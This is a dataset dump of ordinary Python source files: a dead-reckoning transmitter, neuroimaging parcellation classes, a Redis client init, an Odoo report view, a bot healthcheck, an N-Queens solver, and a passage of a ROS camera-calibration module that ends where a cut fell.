Dataset schema (reconstructed from the flattened column header; ⌀ marks a nullable column):

| column | dtype | min | max |
|---|---|---|---|
| blob_id | string | 40 chars | 40 chars |
| directory_id | string | 40 chars | 40 chars |
| path | string | 3 chars | 616 chars |
| content_id | string | 40 chars | 40 chars |
| detected_licenses | sequence | 0 items | 112 items |
| license_type | string (2 classes) | | |
| repo_name | string | 5 chars | 115 chars |
| snapshot_id | string | 40 chars | 40 chars |
| revision_id | string | 40 chars | 40 chars |
| branch_name | string (777 classes) | | |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 | 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 | 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 | 2023-09-06 01:08:06 |
| github_id | int64 ⌀ | 4.92k | 681M |
| star_events_count | int64 | 0 | 209k |
| fork_events_count | int64 | 0 | 110k |
| gha_license_id | string (22 classes) | | |
| gha_event_created_at | timestamp[us] ⌀ | 2012-06-04 01:52:49 | 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] ⌀ | 2008-05-22 07:58:19 | 2023-08-21 12:35:19 |
| gha_language | string (149 classes) | | |
| src_encoding | string (26 classes) | | |
| language | string (1 class) | | |
| is_vendor | bool (2 classes) | | |
| is_generated | bool (2 classes) | | |
| length_bytes | int64 | 3 | 10.2M |
| extension | string (188 classes) | | |
| content | string | 3 chars | 10.2M chars |
| authors | sequence | 1 item | 1 item |
| author_id | string | 1 char | 132 chars |

Each record below follows this schema: fields are pipe-separated in the column order above, with the file text inlined in the `content` field.
99fc264e361c08fda18f058be8e53b400b61379e | 6ecf40c771874f31fa19f9534677c95c731352e9 | /DRTransmitter.py | d60163c5eddb41d056a1880c6cf332dfa9d71c5b | [] | no_license | fstakem/OptNetFilt | 1c86e82629352ee8ee9eb270aa3be01c6202696d | c862f3d1dd09ad9cdd146871761cb1f814e82de9 | refs/heads/master | 2016-09-11T03:06:06.466206 | 2014-06-07T02:03:04 | 2014-06-07T02:03:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,700 | py | # .------------------------------------------------------------------------------.
# | |
# | D E A D R E C K O N I N G T R A N S M I T T E R |
# | |
# '------------------------------------------------------------------------------'
from copy import *
from Vector import Vector
from Sample import Sample
from PredictionSample import PredictionSample
from Packet import Packet
class DRTransmitter(object):
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# P U B L I C F U N C T I O N S
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def __init__(self, heartbeatRate):
# Data
self.inputData = []
self.transmittedPackets = []
# Algorithm parameters
self.distanceThreshold = 0.01
self.heartbeatRate = 500
if isinstance( heartbeatRate, int ) and heartbeatRate > 0:
self.heartbeatRate = heartbeatRate
def getTransmittedPackets(self, distanceThreshold, data):
if isinstance( data, list ):
self.inputData = data
if isinstance( distanceThreshold, float ) and distanceThreshold > 0:
self.distanceThreshold = distanceThreshold
self.executeAlgorithm()
return self.transmittedPackets
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# P R I V A T E F U N C T I O N S
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def executeAlgorithm(self):
self.transmittedPackets = []
sequenceNumber = 1
# Start algorithm before loop
self.transmittedPackets.append( self.createPacket(self.inputData[0], sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = self.inputData[0]
for predictionSample in self.inputData:
estimatedPosition = self.calculateEstPosition(lastTransmittedSample, \
predictionSample.sample.time)
distance = predictionSample.sample.position.distance(estimatedPosition)
if predictionSample.sample.time >= \
( lastTransmittedSample.sample.time + self.heartbeatRate ):
self.transmittedPackets.append( self.createPacket(predictionSample, sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = predictionSample
elif distance >= self.distanceThreshold:
self.transmittedPackets.append( self.createPacket(predictionSample, sequenceNumber) )
sequenceNumber += 1
lastTransmittedSample = predictionSample
def calculateEstPosition(self, lastTransmittedSample, currentTime):
deltaTime = currentTime - lastTransmittedSample.sample.time
deltaTimeVector = Vector(deltaTime, deltaTime, deltaTime)
deltaPosition = lastTransmittedSample.velocity * deltaTimeVector
estimatedPosition = lastTransmittedSample.sample.position + deltaPosition
return estimatedPosition
def createPacket(self, predictionSample, sequenceNumber):
packet = Packet()
packet.predictionSample = copy( predictionSample )
packet.sequenceNumber = sequenceNumber
packet.timeTransmitted = predictionSample.sample.time
return packet | [
"[email protected]"
] | |
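A minimal usage sketch for the `DRTransmitter` record above. The way `Vector`, `Sample`, and `PredictionSample` are constructed here is an assumption inferred from the attribute accesses in the class (`sample.time`, `sample.position`, `velocity`); the real OptNetFilt classes may populate these objects differently.

```python
# Hedged sketch: drive the dead-reckoning transmitter with a synthetic path.
from DRTransmitter import DRTransmitter
from Vector import Vector
from Sample import Sample
from PredictionSample import PredictionSample

samples = []
for t in range(0, 5000, 100):              # one sample every 100 ms
    ps = PredictionSample()                # no-arg construction is assumed
    ps.sample = Sample()
    ps.sample.time = t
    ps.sample.position = Vector(0.001 * t, 0.0, 0.0)  # steady drift along x
    ps.velocity = Vector(0.001, 0.0, 0.0)
    samples.append(ps)

transmitter = DRTransmitter(500)           # heartbeat at most every 500 ms
packets = transmitter.getTransmittedPackets(0.05, samples)
print(len(packets), "packets transmitted")
```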
de83a23717434f077f88e113fd01c3bab8a6fea2 | 4a41223e8c8ab33d83c6f213692c6097bb96540d | /eelbrain/_experiment/parc.py | 9fc979de7443ed56f4acb4c9f91f8447365c11b2 | [
"BSD-3-Clause"
] | permissive | rbaehr/Eelbrain | 33ceeee24533581ab3e7569c31e0f6a6c6dfcda1 | 6301dc256e351fdbb58bbe13ab48fde7bfcf192a | refs/heads/master | 2021-07-05T19:19:20.573231 | 2017-10-03T04:35:23 | 2017-10-03T04:35:23 | 104,907,464 | 0 | 0 | null | 2017-09-26T16:03:20 | 2017-09-26T16:03:20 | null | UTF-8 | Python | false | false | 2,196 | py | import re
COMBINATION_PARC = 'combination'
FS_PARC = 'subject_parc' # Parcellation that comes with every MRI subject
FSA_PARC = 'fsaverage_parc' # Parcellation that comes with fsaverage
SEEDED_PARC = 'seeded'
SEEDED_PARC_RE = re.compile(r'(\w+)-(\d+)$')
class Parcellation(object):
make = False
morph_from_fsaverage = False
def __init__(self, name, views=None):
self.name = name
self.views = views
def as_dict(self):
return NotImplemented
class CombinationParcellation(Parcellation):
"Recombine labels from an existingparcellation"
make = True
def __init__(self, name, base, labels, views=None):
Parcellation.__init__(self, name, views)
self.base = base
self.labels = labels
def as_dict(self):
return {'kind': COMBINATION_PARC, 'base': self.base,
'labels': self.labels}
class EelbrainParcellation(Parcellation):
"Parcellation that has special make rule"
make = True
def __init__(self, name, morph_from_fsaverage, views=None):
Parcellation.__init__(self, name, views)
self.morph_from_fsaverage = morph_from_fsaverage
def as_dict(self):
return {'kind': 'eelbrain_parc'}
class FreeSurferParcellation(Parcellation):
"Parcellation that comes with FreeSurfer"
def as_dict(self):
return {'kind': FS_PARC}
class FSAverageParcellation(Parcellation):
"Parcellation that comes with FSAverage"
morph_from_fsaverage = True
def as_dict(self):
return {'kind': FSA_PARC}
class SeededParcellation(Parcellation):
"Parcellation that is grown from seed vertices"
make = True
def __init__(self, name, seeds, mask=None, surface='white', views=None):
Parcellation.__init__(self, name, views)
self.seeds = seeds
self.mask = mask
self.surface = surface
def as_dict(self):
return {'kind': SEEDED_PARC, 'seeds': self.seeds,
'surface': self.surface, 'mask': self.mask}
PARC_CLASSES = {
COMBINATION_PARC: CombinationParcellation,
FS_PARC: FreeSurferParcellation,
FSA_PARC: FSAverageParcellation,
SEEDED_PARC: SeededParcellation,
}
| [
"[email protected]"
] | |
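A small sketch of how the parcellation registry above can be exercised. The label name and seed coordinates are illustrative placeholders, and the seed-dict format passed to `SeededParcellation` is an assumption; only the class names and `SEEDED_PARC_RE` come from the record.

```python
# Illustrative only: parse a seeded-parc name and build one definition.
import re
from eelbrain._experiment.parc import SeededParcellation

SEEDED_PARC_RE = re.compile(r'(\w+)-(\d+)$')    # mirrors the module constant

m = SEEDED_PARC_RE.match('superiortemporal-25')
if m:
    base, extent = m.group(1), int(m.group(2))
    print(base, extent)                         # -> superiortemporal 25

parc = SeededParcellation('st', seeds={'superiortemporal': (-54, -22, 6)})
print(parc.as_dict())  # {'kind': 'seeded', 'seeds': ..., 'surface': 'white', 'mask': None}
```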
69e27cea29749aeb55b8285ea5472f561685d74c | fd9ce5afe2d1160e04071e0645eb823e90ed66bb | /tredis/__init__.py | f38a49bae5e190831d83b61c48569bf1f710f587 | [] | no_license | haoxuu/tredis | b5efb1728ba94e7799547288623241706c9bd9f9 | 506c9a8e3d63b4a654e022f5d8127c8de4c82faf | refs/heads/master | 2021-01-18T16:04:36.292451 | 2017-04-13T12:58:48 | 2017-04-13T12:58:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | """
TRedis
======
An asynchronous Redis client for Tornado
"""
from tredis.client import Client, RedisClient
from tredis.exceptions import *
from tredis.strings import BITOP_AND, BITOP_OR, BITOP_XOR, BITOP_NOT
__version__ = '0.7.2'
| [
"[email protected]"
] | |
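A hypothetical connection sketch for the `tredis` package above. Only the names re-exported in `__init__.py` (`Client`, `RedisClient`) are taken from the record; the constructor arguments and the Tornado coroutine style below are assumptions about the underlying API.

```python
# Assumed API: RedisClient(host, port) driven from Tornado's IOLoop.
from tornado import gen, ioloop
import tredis

@gen.coroutine
def main():
    client = tredis.RedisClient(host='127.0.0.1', port=6379)  # args assumed
    yield client.set('greeting', 'hello')
    value = yield client.get('greeting')
    print(value)

ioloop.IOLoop.current().run_sync(main)
```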
066775eea5a9fc755660f1f1b211a6359a9d39b9 | eb82022c0cfc7c8747661cff9624ad2099fa1c3f | /accounting_report_xls/wizard/requisition_report.py | b8a86af9ecb7b11cf815777cb5903909435929ab | [] | no_license | dadysuarsa/Odoo | 8d026a066c390cc8f72805d2672212e61260c1cb | c9becd0c192fa239520ad3e1a11d81f70832eddf | refs/heads/master | 2023-03-11T06:02:06.011575 | 2021-02-26T02:17:37 | 2021-02-26T02:17:37 | 276,346,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
#
# Please note that these reports are not multi-currency !!!
#
from odoo import api, fields, models, tools
class RequisitionReport(models.Model):
_name = "requisition.report"
_description = "Requisition Reports"
_auto = False
_order = 'pr_date desc'
pr_date = fields.Datetime('Requisition Date', readonly=True, help="Date on which this document has been created")
product_id = fields.Many2one('product.product', 'Product', readonly=True)
requisition_id = fields.Many2one('po.request', 'Requisition', readonly=True)
purchase_id = fields.Many2one('purchase.order', 'Purchase', readonly=True)
partner_id = fields.Many2one('res.partner', 'Vendor', readonly=True)
uom_id = fields.Many2one('product.uom', 'Unit of Measure', required=True)
pr_qty = fields.Float('PR Qty', readonly=True)
po_qty = fields.Float('PO Qty', readonly=True)
sm_qty = fields.Float('STPB Qty', readonly=True)
@api.model_cr
def init(self):
tools.drop_view_if_exists(self._cr, 'requisition_report')
self._cr.execute("""
create view requisition_report as (
select
min(prl.id) as id,
prl.order_id as requisition_id,
pr.date_trans as pr_date,
pr.divisi as divisi,
prl.product_id as product_id,
prl.product_qty as pr_qty,
po.id as purchase_id,
pol2.product_qty as po_qty,
pol2.price_unit as po_price,
sm.product_uom_qty as sm_qty
from po_request_line prl
left join po_request pr on (pr.id = prl.order_id)
left join purchase_order po on (po.po_request_id = prl.id)
left join purchase_order_line pol on (pol.order_id = po.id)
left join purchase_order_line pol2 on (pol2.product_id = prl.product_id)
left join stock_move sm on (sm.purchase_line_id = pol2.id)
group by
prl.order_id,
pr.date_trans,
pr.divisi,
prl.product_id,
prl.product_qty,
po.id,
pol2.product_qty,
sm.product_uom_qty,
pol2.price_unit
)
""")
| [
"[email protected]"
] | |
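A hypothetical read of the SQL view above from an Odoo shell. `env` is the standard shell environment; the domain and limit are illustrative. Because the model is backed by a view (`_auto = False`), records are read-only.

```python
# Read-only view: records come from the SQL above, so no create()/write().
reports = env['requisition.report'].search([('po_qty', '>', 0)], limit=5)
for rec in reports:
    print(rec.requisition_id.id, rec.pr_qty, rec.po_qty, rec.sm_qty)
```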
2571969d76af0f76eb9cf4d6518aa2ee3cb716ed | 4c207b2dd10db5598ccf5d04ccbf5b272bb1a3ae | /app/services/healthcheck.py | d01f5b6cb3836e30f9e6bcdb524a2b45be854c81 | [
"MIT"
] | permissive | sina-e/bot | 44ede51f498bae10bae59c705dbe42e2d78921cc | 5d892a24724b3cd9b50928f1f5753e8b38d537c4 | refs/heads/master | 2022-03-22T12:32:30.890950 | 2019-11-10T09:53:10 | 2019-11-10T09:53:10 | 244,046,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | from aiogram import Dispatcher
from aiogram.utils.executor import Executor
from aiohttp_healthcheck import HealthCheck
from loguru import logger
from app import config
health = HealthCheck()
def setup(executor: Executor):
executor.on_startup(on_startup, webhook=True, polling=False)
async def on_startup(dispatcher: Dispatcher):
from app.utils.executor import runner
logger.info("Setup healthcheck")
health.add_check(check_redis)
health.add_check(check_postgres)
health.add_check(check_webhook)
runner.web_app.router.add_get("/healthcheck", health)
async def check_redis():
from app.misc import storage
try:
redis = await storage.redis()
info = await redis.info()
except Exception as e:
return False, str(e)
return True, f"Redis {info['server']['redis_version']}"
async def check_postgres():
from app.models.db import db
try:
version = await db.scalar("select version();")
except Exception as e:
return False, str(e)
return True, version
async def check_webhook():
from app.misc import bot
webhook = await bot.get_webhook_info()
if webhook.url and webhook.url == config.WEBHOOK_URL:
return True, f"Webhook configured. Pending updates count {webhook.pending_update_count}"
else:
logger.error("Configured wrong webhook URL {webhook}", webhook=webhook.url)
return False, "Configured invalid webhook URL"
| [
"[email protected]"
] | |
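A quick probe of the endpoint registered above, once the webhook runner's aiohttp app is listening; host and port are placeholders, and the response body is whatever `aiohttp_healthcheck` emits for the three checks.

```python
import asyncio
import aiohttp

async def probe():
    async with aiohttp.ClientSession() as session:
        async with session.get('http://127.0.0.1:8080/healthcheck') as resp:
            print(resp.status, await resp.text())

asyncio.run(probe())
```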
64aaae03c3ab90f3f0225cbf42dc6b88da545cbb | 8bdce915174678a90a6be811ea91b50930b9d26a | /coding/Algorithm_exercise/Leetcode/0051-N-Queens.py | feda3efdc7bdf33d817beb02ebc76b87d12dbe3e | [] | no_license | CharlesBird/Resources | daefffef8fb3735e656cd0a3bf400d5e2ff85cc0 | 517ac7b7992a686fa5370b6fda8b62663735853c | refs/heads/master | 2022-12-15T02:54:56.530940 | 2020-02-29T14:33:43 | 2020-02-29T14:33:43 | 109,668,108 | 1 | 1 | null | 2022-12-08T05:04:25 | 2017-11-06T08:34:30 | Jupyter Notebook | UTF-8 | Python | false | false | 1,247 | py | """
The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.
Given an integer n, return all distinct solutions to the n-queens puzzle.
Each solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.
Example:
Input: 4
Output: [
[".Q..", // Solution 1
"...Q",
"Q...",
"..Q."],
["..Q.", // Solution 2
"Q...",
"...Q",
".Q.."]
]
Explanation: There exist two distinct solutions to the 4-queens puzzle as shown above.
"""
from typing import List
class Solution:
def solveNQueens(self, n: int) -> 'List[List[str]]':
        def valid(cols, index):
            # The queen in row `index` must not share a column or a
            # diagonal (|column delta| == row delta) with any earlier row.
            for i in range(index):
                if abs(cols[i] - cols[index]) == index - i or cols[i] == cols[index]:
                    return False
            return True
def dfs(cols, index, path):
if index == len(cols):
res.append(path)
return
for i in range(len(cols)):
cols[index] = i
if valid(cols, index):
dfs(cols, index+1, path+["."*i+"Q"+"."*(n-i-1)])
res = []
dfs([-1] * n, 0, [])
return res | [
"[email protected]"
] | |
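A quick check of the solver above on the n = 4 case from its docstring, assuming the `Solution` class is defined in the same module.

```python
if __name__ == '__main__':
    for solution in Solution().solveNQueens(4):
        for row in solution:
            print(row)
        print('---')   # separator between the two distinct solutions
```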
d39d55626150a5f216c292e0bd94792f134a3b53 | 3670f2ca6f5609e14cce8c31cb1348052d0b6358 | /xacro/image_pipeline/camera_calibration/src/camera_calibration/calibrator.py | 48ffaee50b851449e5fbccc9f254a8649ec5cd16 | [] | no_license | jincheng-ai/ros-melodic-python3-opencv4 | b0f4d3860ab7ae3d683ade8aa03e74341eff7fcf | 47c74188560c2274b8304647722d0c9763299a4b | refs/heads/main | 2023-05-28T17:37:34.345164 | 2021-06-17T09:59:25 | 2021-06-17T09:59:25 | 377,856,153 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,581 | py | #!/usr/bin/env python
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from io import BytesIO
import cv2
import cv_bridge
import image_geometry
import math
import numpy.linalg
import pickle
import random
import sensor_msgs.msg
import tarfile
import time
from distutils.version import LooseVersion
import sys
from enum import Enum
# Supported camera models
class CAMERA_MODEL(Enum):
PINHOLE = 0
FISHEYE = 1
# Supported calibration patterns
class Patterns:
Chessboard, Circles, ACircles = list(range(3))
class CalibrationException(Exception):
pass
# TODO: Make pattern per-board?
class ChessboardInfo(object):
def __init__(self, n_cols = 0, n_rows = 0, dim = 0.0):
self.n_cols = n_cols
self.n_rows = n_rows
self.dim = dim
# Make all private!!!!!
def lmin(seq1, seq2):
""" Pairwise minimum of two sequences """
return [min(a, b) for (a, b) in zip(seq1, seq2)]
def lmax(seq1, seq2):
""" Pairwise maximum of two sequences """
return [max(a, b) for (a, b) in zip(seq1, seq2)]
def _pdist(p1, p2):
"""
    Distance between two points. p1 = (x, y), p2 = (x, y)
"""
return math.sqrt(math.pow(p1[0] - p2[0], 2) + math.pow(p1[1] - p2[1], 2))
def _get_outside_corners(corners, board):
"""
Return the four corners of the board as a whole, as (up_left, up_right, down_right, down_left).
"""
xdim = board.n_cols
ydim = board.n_rows
if corners.shape[1] * corners.shape[0] != xdim * ydim:
raise Exception("Invalid number of corners! %d corners. X: %d, Y: %d" % (corners.shape[1] * corners.shape[0],
xdim, ydim))
up_left = corners[0,0]
up_right = corners[xdim - 1,0]
down_right = corners[-1,0]
down_left = corners[-xdim,0]
return (up_left, up_right, down_right, down_left)
def _get_skew(corners, board):
"""
Get skew for given checkerboard detection.
    Scaled to [0,1], where 0 = no skew, 1 = high skew
Skew is proportional to the divergence of three outside corners from 90 degrees.
"""
# TODO Using three nearby interior corners might be more robust, outside corners occasionally
# get mis-detected
up_left, up_right, down_right, _ = _get_outside_corners(corners, board)
def angle(a, b, c):
"""
Return angle between lines ab, bc
"""
ab = a - b
cb = c - b
return math.acos(numpy.dot(ab,cb) / (numpy.linalg.norm(ab) * numpy.linalg.norm(cb)))
skew = min(1.0, 2. * abs((math.pi / 2.) - angle(up_left, up_right, down_right)))
return skew
def _get_area(corners, board):
"""
Get 2d image area of the detected checkerboard.
The projected checkerboard is assumed to be a convex quadrilateral, and the area computed as
|p X q|/2; see http://mathworld.wolfram.com/Quadrilateral.html.
"""
(up_left, up_right, down_right, down_left) = _get_outside_corners(corners, board)
a = up_right - up_left
b = down_right - up_right
c = down_left - down_right
p = b + c
q = a + b
return abs(p[0]*q[1] - p[1]*q[0]) / 2.
def _get_corners(img, board, refine = True, checkerboard_flags=0):
"""
Get corners for a particular chessboard for an image
"""
h = img.shape[0]
w = img.shape[1]
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
(ok, corners) = cv2.findChessboardCorners(mono, (board.n_cols, board.n_rows), flags = cv2.CALIB_CB_ADAPTIVE_THRESH |
cv2.CALIB_CB_NORMALIZE_IMAGE | checkerboard_flags)
if not ok:
return (ok, corners)
# If any corners are within BORDER pixels of the screen edge, reject the detection by setting ok to false
# NOTE: This may cause problems with very low-resolution cameras, where 8 pixels is a non-negligible fraction
# of the image size. See http://answers.ros.org/question/3155/how-can-i-calibrate-low-resolution-cameras
BORDER = 8
if not all([(BORDER < corners[i, 0, 0] < (w - BORDER)) and (BORDER < corners[i, 0, 1] < (h - BORDER)) for i in range(corners.shape[0])]):
ok = False
# Ensure that all corner-arrays are going from top to bottom.
if board.n_rows!=board.n_cols:
if corners[0, 0, 1] > corners[-1, 0, 1]:
corners = numpy.copy(numpy.flipud(corners))
else:
direction_corners=(corners[-1]-corners[0])>=numpy.array([[0.0,0.0]])
if not numpy.all(direction_corners):
if not numpy.any(direction_corners):
corners = numpy.copy(numpy.flipud(corners))
elif direction_corners[0][0]:
corners=numpy.rot90(corners.reshape(board.n_rows,board.n_cols,2)).reshape(board.n_cols*board.n_rows,1,2)
else:
corners=numpy.rot90(corners.reshape(board.n_rows,board.n_cols,2),3).reshape(board.n_cols*board.n_rows,1,2)
if refine and ok:
# Use a radius of half the minimum distance between corners. This should be large enough to snap to the
# correct corner, but not so large as to include a wrong corner in the search window.
min_distance = float("inf")
for row in range(board.n_rows):
for col in range(board.n_cols - 1):
                index = row*board.n_cols + col
min_distance = min(min_distance, _pdist(corners[index, 0], corners[index + 1, 0]))
for row in range(board.n_rows - 1):
for col in range(board.n_cols):
                index = row*board.n_cols + col
min_distance = min(min_distance, _pdist(corners[index, 0], corners[index + board.n_cols, 0]))
radius = int(math.ceil(min_distance * 0.5))
cv2.cornerSubPix(mono, corners, (radius,radius), (-1,-1),
( cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1 ))
return (ok, corners)
def _get_circles(img, board, pattern):
"""
Get circle centers for a symmetric or asymmetric grid
"""
h = img.shape[0]
w = img.shape[1]
if len(img.shape) == 3 and img.shape[2] == 3:
mono = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
mono = img
flag = cv2.CALIB_CB_SYMMETRIC_GRID
if pattern == Patterns.ACircles:
flag = cv2.CALIB_CB_ASYMMETRIC_GRID
mono_arr = numpy.array(mono)
(ok, corners) = cv2.findCirclesGrid(mono_arr, (board.n_cols, board.n_rows), flags=flag)
# In symmetric case, findCirclesGrid does not detect the target if it's turned sideways. So we try
# again with dimensions swapped - not so efficient.
# TODO Better to add as second board? Corner ordering will change.
if not ok and pattern == Patterns.Circles:
(ok, corners) = cv2.findCirclesGrid(mono_arr, (board.n_rows, board.n_cols), flags=flag)
return (ok, corners)
def _get_dist_model(dist_params, cam_model):
# Select dist model
if CAMERA_MODEL.PINHOLE == cam_model:
if dist_params.size > 5:
dist_model = "rational_polynomial"
else:
dist_model = "plumb_bob"
elif CAMERA_MODEL.FISHEYE == cam_model:
dist_model = "fisheye"
else:
dist_model = "unknown"
return dist_model
# TODO self.size needs to come from CameraInfo, full resolution
class Calibrator(object):
"""
Base class for calibration system
"""
def __init__(self, boards, flags=0, fisheye_flags = 0, pattern=Patterns.Chessboard, name='',
checkerboard_flags=cv2.CALIB_CB_FAST_CHECK, max_chessboard_speed = -1.0):
# Ordering the dimensions for the different detectors is actually a minefield...
if pattern == Patterns.Chessboard:
# Make sure n_cols > n_rows to agree with OpenCV CB detector output
self._boards = [ChessboardInfo(max(i.n_cols, i.n_rows), min(i.n_cols, i.n_rows), i.dim) for i in boards]
elif pattern == Patterns.ACircles:
# 7x4 and 4x7 are actually different patterns. Assume square-ish pattern, so n_rows > n_cols.
self._boards = [ChessboardInfo(min(i.n_cols, i.n_rows), max(i.n_cols, i.n_rows), i.dim) for i in boards]
elif pattern == Patterns.Circles:
# We end up having to check both ways anyway
self._boards = boards
# Set to true after we perform calibration
self.calibrated = False
self.calib_flags = flags
self.fisheye_calib_flags = fisheye_flags
self.checkerboard_flags = checkerboard_flags
self.pattern = pattern
self.br = cv_bridge.CvBridge()
self.camera_model = CAMERA_MODEL.PINHOLE
# self.db is list of (parameters, image) samples for use in calibration. parameters has form
# (X, Y, size, skew) all normalized to [0,1], to keep track of what sort of samples we've taken
# and ensure enough variety.
self.db = []
# For each db sample, we also record the detected corners.
self.good_corners = []
# Set to true when we have sufficiently varied samples to calibrate
self.goodenough = False
self.param_ranges = [0.7, 0.7, 0.4, 0.5]
self.name = name
self.last_frame_corners = None
self.max_chessboard_speed = max_chessboard_speed
def mkgray(self, msg):
"""
Convert a message into a 8-bit 1 channel monochrome OpenCV image
"""
# as cv_bridge automatically scales, we need to remove that behavior
# TODO: get a Python API in cv_bridge to check for the image depth.
if self.br.encoding_to_dtype_with_channels(msg.encoding)[0] in ['uint16', 'int16']:
mono16 = self.br.imgmsg_to_cv2(msg, '16UC1')
mono8 = numpy.array(mono16 / 256, dtype=numpy.uint8)
return mono8
elif 'FC1' in msg.encoding:
# floating point image handling
img = self.br.imgmsg_to_cv2(msg, "passthrough")
_, max_val, _, _ = cv2.minMaxLoc(img)
if max_val > 0:
scale = 255.0 / max_val
mono_img = (img * scale).astype(numpy.uint8)
else:
mono_img = img.astype(numpy.uint8)
return mono_img
else:
return self.br.imgmsg_to_cv2(msg, "mono8")
def get_parameters(self, corners, board, size):
"""
Return list of parameters [X, Y, size, skew] describing the checkerboard view.
"""
(width, height) = size
Xs = corners[:,:,0]
Ys = corners[:,:,1]
area = _get_area(corners, board)
border = math.sqrt(area)
# For X and Y, we "shrink" the image all around by approx. half the board size.
# Otherwise large boards are penalized because you can't get much X/Y variation.
p_x = min(1.0, max(0.0, (numpy.mean(Xs) - border / 2) / (width - border)))
p_y = min(1.0, max(0.0, (numpy.mean(Ys) - border / 2) / (height - border)))
p_size = math.sqrt(area / (width * height))
skew = _get_skew(corners, board)
params = [p_x, p_y, p_size, skew]
return params
def set_cammodel(self, modeltype):
self.camera_model = modeltype
def is_slow_moving(self, corners, last_frame_corners):
"""
Returns true if the motion of the checkerboard is sufficiently low between
this and the previous frame.
"""
# If we don't have previous frame corners, we can't accept the sample
if last_frame_corners is None:
return False
num_corners = len(corners)
corner_deltas = (corners - last_frame_corners).reshape(num_corners, 2)
# Average distance travelled overall for all corners
average_motion = numpy.average(numpy.linalg.norm(corner_deltas, axis = 1))
return average_motion <= self.max_chessboard_speed
def is_good_sample(self, params, corners, last_frame_corners):
"""
Returns true if the checkerboard detection described by params should be added to the database.
"""
if not self.db:
return True
def param_distance(p1, p2):
return sum([abs(a-b) for (a,b) in zip(p1, p2)])
db_params = [sample[0] for sample in self.db]
d = min([param_distance(params, p) for p in db_params])
#print "d = %.3f" % d #DEBUG
# TODO What's a good threshold here? Should it be configurable?
if d <= 0.2:
return False
if self.max_chessboard_speed > 0:
if not self.is_slow_moving(corners, last_frame_corners):
return False
# All tests passed, image should be good for calibration
return True
_param_names = ["X", "Y", "Size", "Skew"]
def compute_goodenough(self):
if not self.db:
return None
# Find range of checkerboard poses covered by samples in database
all_params = [sample[0] for sample in self.db]
min_params = all_params[0]
max_params = all_params[0]
for params in all_params[1:]:
min_params = lmin(min_params, params)
max_params = lmax(max_params, params)
# Don't reward small size or skew
min_params = [min_params[0], min_params[1], 0., 0.]
# For each parameter, judge how much progress has been made toward adequate variation
progress = [min((hi - lo) / r, 1.0) for (lo, hi, r) in zip(min_params, max_params, self.param_ranges)]
# If we have lots of samples, allow calibration even if not all parameters are green
# TODO Awkward that we update self.goodenough instead of returning it
self.goodenough = (len(self.db) >= 40) or all([p == 1.0 for p in progress])
return list(zip(self._param_names, min_params, max_params, progress))
def mk_object_points(self, boards, use_board_size = False):
opts = []
for i, b in enumerate(boards):
num_pts = b.n_cols * b.n_rows
opts_loc = numpy.zeros((num_pts, 1, 3), numpy.float32)
for j in range(num_pts):
                opts_loc[j, 0, 0] = (j // b.n_cols)
if self.pattern == Patterns.ACircles:
opts_loc[j, 0, 1] = 2*(j % b.n_cols) + (opts_loc[j, 0, 0] % 2)
else:
opts_loc[j, 0, 1] = (j % b.n_cols)
opts_loc[j, 0, 2] = 0
if use_board_size:
opts_loc[j, 0, :] = opts_loc[j, 0, :] * b.dim
opts.append(opts_loc)
return opts
def get_corners(self, img, refine = True):
"""
Use cvFindChessboardCorners to find corners of chessboard in image.
Check all boards. Return corners for first chessboard that it detects
if given multiple size chessboards.
Returns (ok, corners, board)
